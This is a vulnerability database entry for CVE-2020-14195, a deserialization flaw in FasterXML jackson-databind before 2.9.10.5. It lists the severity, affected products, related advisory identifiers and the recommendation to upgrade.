PT-2020-4416 · Fasterxml+3 · Jackson-Databind+3

Published

2020-06-16

Updated

2025-09-29

CVE-2020-14195

CVSS v3.1

8.1

High

Vector

AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Name of the Vulnerable Software and Affected Versions: FasterXML jackson-databind versions 2.x before 2.9.10.5

Description: The issue is related to the interaction between serialization gadgets and typing in the jackson-databind library, specifically with the org.jsecurity.realm.jndi.JndiRealmFactory component. It is also described as a vulnerability in the deserialization mechanism of the Jackson-databind library. Exploitation of this issue may allow a remote attacker to execute arbitrary code in the target system.

Recommendations: For FasterXML jackson-databind versions 2.x before 2.9.10.5, update to version 2.9.10.5 or later to resolve the issue.

Exploit

Fix

Deserialization of Untrusted Data

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-502

Related Identifiers

ALSA-2025_16880

ALT-PU-2021-1792

BDU:2020-04944

CVE-2020-14195

DLA-2270-1

GHSA-MC6H-4QGP-37QH

MGASA-2021-0153

RHSA-2020:4366

ROSA-SA-2025-2629

USN-4813-1

Affected Products

Alt Linux

Red Os

Ubuntu

Jackson-Databind

PT-2020-4416 · Fasterxml+3 · Jackson-Databind+3

CVE-2020-14195

Weakness Enumeration

Related Identifiers

Affected Products

References · 85